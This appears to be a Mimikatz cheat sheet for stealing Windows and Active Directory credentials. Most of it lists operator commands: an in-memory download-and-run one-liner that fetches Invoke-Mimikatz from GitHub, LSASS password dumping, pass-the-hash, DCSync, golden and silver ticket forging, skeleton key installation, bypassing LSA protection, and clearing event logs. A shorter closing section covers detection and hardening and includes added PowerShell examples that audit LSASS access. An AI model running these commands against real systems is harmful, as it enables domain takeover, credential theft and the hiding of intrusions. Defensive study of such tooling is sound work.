Mimikatz Cheat Sheet
Overview
Mimikatz is a powerful credential dumping and manipulation tool developed by Benjamin Delpy (@gentilkiwi). It can extract plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory, as well as perform various attacks like pass-the-hash, pass-the-ticket, and golden ticket creation.
⚠️ Warning: Mimikatz is a security testing tool that can be used maliciously. Only use it in environments where you have explicit permission to do so.
Obtaining Mimikatz
Official Repository
Pre-compiled Binaries
- mimikatz.exe: 32-bit executable
- mimikatz_trunk.zip: contains both 32-bit and 64-bit executables
Compilation from Source
git clone https://github.com/gentilkiwi/mimikatz.git
# Open the solution file in Visual Studio and build
Basic Usage
Running Mimikatz
# Run directly
mimikatz.exe
# Run with PowerShell
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"
# Run from memory
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
Elevating Privileges
Getting Help
help
<module>::
<module>::<command> /?
Exiting Mimikatz
Core Modules and Commands
sekurlsa Module (LSASS Memory Access)
| Command | Description |
|---|---|
| sekurlsa::logonpasswords | Extract all logon passwords |
| sekurlsa::tickets | Extract Kerberos tickets |
| sekurlsa::ekeys | Extract Kerberos encryption keys |
| sekurlsa::dpapi | Extract DPAPI master keys |
| sekurlsa::credman | Extract credentials from Windows Credential Manager |
| sekurlsa::msv | Extract MSV authentication information |
| sekurlsa::tspkg | Extract TSPKG authentication information |
| sekurlsa::wdigest | Extract WDigest authentication information |
| sekurlsa::kerberos | Extract Kerberos authentication information |
| sekurlsa::ssp | Extract SSP authentication information |
| sekurlsa::livessp | Extract LiveSSP authentication information |
| sekurlsa::cloudap | Extract CloudAP authentication information |
lsadump Module (SAM and Active Directory)
| Command | Description |
|---|---|
| lsadump::sam | Extract hashes from the SAM database |
| lsadump::secrets | Extract LSA secrets |
| lsadump::cache | Extract cached domain credentials |
| lsadump::dcsync | Perform DCSync attack to retrieve password data |
| lsadump::lsa | Extract LSA secrets |
| lsadump::trust | Extract domain trust keys |
| lsadump::backupkeys | Extract domain backup keys |
kerberos Module (Ticket Manipulation)
| Command | Description |
|---|---|
| kerberos::list | List all Kerberos tickets |
| kerberos::purge | Purge all Kerberos tickets |
| kerberos::ptt | Pass-the-ticket (inject a ticket) |
| kerberos::golden | Create a golden ticket |
| kerberos::silver | Create a silver ticket |
| kerberos::tgt | Create a TGT |
| kerberos::hash | Calculate Kerberos keys from password |
crypto Module (Cryptographic Operations)
| Command | Description |
|---|---|
| crypto::certificates | List certificates |
| crypto::keys | List keys |
| crypto::system | List system certificates |
| crypto::capi | List CAPI certificates |
| crypto::cng | List CNG certificates |
| crypto::stores | List certificate stores |
vault Module (Windows Vault Access)
| Command | Description |
|---|---|
| vault::cred | List credentials in Windows Vault |
| vault::list | List vault credentials |
token Module (Token Manipulation)
| Command | Description |
|---|---|
| token::whoami | Display current token information |
| token::list | List all tokens |
| token::elevate | Elevate token privileges |
| token::revert | Revert token |
| token::run | Run a process with a token |
privilege Module (Privilege Management)
| Command | Description |
|---|---|
| privilege::debug | Enable debug privilege |
| privilege::driver | Load a driver |
event Module (Event Log Management)
| Command | Description |
|---|---|
| event::clear | Clear event logs |
| event::drop | Drop event logs |
ts Module (Terminal Services)
| Command | Description |
|---|---|
| ts::sessions | List terminal services sessions |
| ts::multirdp | Enable multiple RDP sessions |
misc Module (Miscellaneous)
| Command | Description |
|---|---|
| misc::cmd | Command prompt |
| misc::regedit | Registry editor |
| misc::taskmgr | Task manager |
| misc::ncroutemon | Network connection route monitor |
| misc::detours | Detours detection |
| misc::skeleton | Install skeleton key |
Common Attack Techniques
Credential Dumping
privilege::debug
sekurlsa::logonpasswords
privilege::debug
token::elevate
lsadump::sam
Extract Cached Domain Credentials
privilege::debug
lsadump::cache
# Create dump with Task Manager or procdump
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Pass-the-Hash Attacks
Pass-the-Hash with NTLM
sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:E52CAC67419A9A224A3B108F3FA6CB6D
Pass-the-Hash with AES Keys
sekurlsa::pth /user:Administrator /domain:contoso.local /aes256:E52CAC67419A9A224A3B108F3FA6CB6D1234567890ABCDEF1234567890ABCDEF
Over-Pass-the-Hash (Convert NTLM to Kerberos)
sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:E52CAC67419A9A224A3B108F3FA6CB6D /run:powershell.exe
DCSync Attack
lsadump::dcsync /domain:contoso.local /all
lsadump::dcsync /domain:contoso.local /user:Administrator
lsadump::dcsync /domain:contoso.local /user:krbtgt
Kerberos Ticket Attacks
List Kerberos Tickets
Create a Golden Ticket
# Format: kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /ticket:OUTPUT_FILE
kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:HASH /ticket:golden.kirbi
Create a Silver Ticket
# Format: kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /target:SERVER /service:SERVICE /rc4:SERVICE_HASH /ticket:OUTPUT_FILE
kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:server.contoso.local /service:HTTP /rc4:HASH /ticket:silver.kirbi
Pass-the-Ticket
kerberos::ptt golden.kirbi
Purge Tickets
Skeleton Key Attack
privilege::debug
misc::skeleton
Advanced Techniques
LSA Protection Bypass
# Load mimikatz driver
mimidrv::service
# Enable debug privilege
privilege::debug
# Load driver
!+
# Remove LSASS protection
!processprotect /process:lsass.exe /remove
# Extract credentials
sekurlsa::logonpasswords
Remote Operations
# Create process dump of LSASS
# Using Task Manager or procdump:
# procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Analyze dump file
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Extract Domain Backup Keys
lsadump::backupkeys /system:dc01.contoso.local /export
Command Examples with Parameters
sekurlsa::logonpasswords
sekurlsa::logonpasswords [/patch]
sekurlsa::pth
sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH [/run:COMMAND]
sekurlsa::pth /user:USERNAME /domain:DOMAIN /aes128:HASH [/run:COMMAND]
sekurlsa::pth /user:USERNAME /domain:DOMAIN /aes256:HASH [/run:COMMAND]
lsadump::dcsync
lsadump::dcsync /domain:DOMAIN /user:USERNAME [/guid:{object-guid}]
lsadump::dcsync /domain:DOMAIN /all [/csv]
kerberos::golden
kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:HASH [/id:USER_ID] [/groups:GROUP_IDS] [/ticket:OUTPUT_FILE]
kerberos::ptt
kerberos::ptt TICKET_FILE
Defensive Measures
Detection Methods
- Monitor for process creation of mimikatz.exe or suspicious processes accessing lsass.exe
- Monitor for suspicious LSASS memory access
- Monitor for DCSync operations (replication requests from non-DC machines)
- Monitor for ticket creation and manipulation
- Monitor for privilege escalation
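Detecting the LSASS memory access named above in practice means inspecting process-access telemetry. The following is an added example (not from the original cheat sheet) that evaluates Sysmon Event ID 10 (ProcessAccess) records for handle opens on lsass.exe that request memory-read rights from a non-allowlisted source; the allowlist and the sample records are constructed for illustration.

```powershell
# Added example: flag suspicious handle opens on lsass.exe from Sysmon
# Event ID 10 (ProcessAccess) records. Sample records below are constructed.
# PROCESS_VM_READ (0x0010) is the access right needed to read LSASS memory.
$ProcessVmRead = 0x0010

# Source images that legitimately open lsass.exe on a typical host; tune per estate.
# Paths are assumptions for this example (e.g. the Defender engine path varies).
$AllowedSources = @(
    'C:\Windows\System32\csrss.exe',
    'C:\Windows\System32\wininit.exe',
    'C:\Windows\System32\svchost.exe',
    'C:\Windows\System32\MsMpEng.exe'
)

function Test-SuspiciousLsassAccess {
    param([Parameter(Mandatory)][hashtable]$Event)

    # Only ProcessAccess events whose target is lsass.exe are of interest
    if ($Event.EventId -ne 10) { return $false }
    if ((Split-Path $Event.TargetImage -Leaf) -ne 'lsass.exe') { return $false }

    # Sysmon logs GrantedAccess as a hex string such as "0x1010"
    $granted     = [Convert]::ToInt32($Event.GrantedAccess, 16)
    $readsMemory = ($granted -band $ProcessVmRead) -ne 0
    $trusted     = $AllowedSources -contains $Event.SourceImage

    return ($readsMemory -and -not $trusted)
}

# Constructed sample telemetry (not real logs): one benign query, one tool reading
# memory, one Task Manager dump (full access), and one non-ProcessAccess event.
$Samples = @(
    @{ EventId = 10; SourceImage = 'C:\Windows\System32\svchost.exe'; TargetImage = 'C:\Windows\System32\lsass.exe'; GrantedAccess = '0x1000' },
    @{ EventId = 10; SourceImage = 'C:\Users\Public\mimikatz.exe';     TargetImage = 'C:\Windows\System32\lsass.exe'; GrantedAccess = '0x1010' },
    @{ EventId = 10; SourceImage = 'C:\Windows\System32\taskmgr.exe';  TargetImage = 'C:\Windows\System32\lsass.exe'; GrantedAccess = '0x1FFFFF' },
    @{ EventId = 1;  SourceImage = 'C:\Users\Public\mimikatz.exe';     TargetImage = 'C:\Windows\System32\lsass.exe'; GrantedAccess = '0x1010' }
)

# Expected: the mimikatz.exe and taskmgr.exe ProcessAccess records are reported
$Samples | Where-Object { Test-SuspiciousLsassAccess $_ } |
    ForEach-Object { "ALERT: $($_.SourceImage) opened lsass.exe with GrantedAccess $($_.GrantedAccess)" }
```

A renamed binary defeats image-name matching, which is why the check keys on the access mask and an allowlist of sources rather than on the name mimikatz.exe.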
Prevention Methods
- Enable LSA Protection (RunAsPPL)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f
- Enable Credential Guard (Windows 10/Server 2016+)
- Implement Protected Users group
- Disable WDigest authentication
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 0 /f
- Implement Just Enough Administration (JEA)
- Regular password rotation
- Limit administrative privileges
- Use strong passwords
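To verify that the registry hardening above is actually in place on a host, the following added example (not part of the original cheat sheet) reads RunAsPPL and UseLogonCredential and checks whether Credential Guard is running; it is read-only and assumes an elevated PowerShell session on a Windows 10/Server 2016 or later host.

```powershell
# Added example: audit a host for the LSASS hardening settings listed above.
# Read-only; run from an elevated PowerShell session.
function Get-LsaSetting {
    param([string]$Path, [string]$Name)
    try   { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }   # value is absent
}

function Test-CredentialGuardRunning {
    try {
        $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' `
                              -ClassName Win32_DeviceGuard -ErrorAction Stop
        # SecurityServicesRunning contains 1 while Credential Guard is active
        return [bool]($dg.SecurityServicesRunning -contains 1)
    } catch { return $false }   # class absent on older builds or non-VBS hosts
}

function Get-CredentialHardeningReport {
    $lsaPath     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $wdigestPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'

    $ppl     = Get-LsaSetting $lsaPath 'RunAsPPL'
    $wdigest = Get-LsaSetting $wdigestPath 'UseLogonCredential'

    [PSCustomObject]@{
        # 1 = LSA protection on; 2 = on without UEFI lock (Windows 11 22H2 and later)
        LsaProtection    = $(if ($ppl -in @(1, 2)) { 'Enabled' } else { 'DISABLED (set RunAsPPL=1)' })
        # 0 stops WDigest caching plaintext; an absent value is default-off on
        # Windows 8.1/Server 2012 R2 and later, but set it explicitly anyway
        WDigestPlaintext = $(if ($wdigest -eq 0) { 'Disabled' }
                             elseif ($null -eq $wdigest) { 'Default (set UseLogonCredential=0 explicitly)' }
                             else { 'ENABLED (set UseLogonCredential=0)' })
        CredentialGuard  = $(if (Test-CredentialGuardRunning) { 'Running' } else { 'NOT running' })
    }
}

Get-CredentialHardeningReport | Format-List
```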
Resources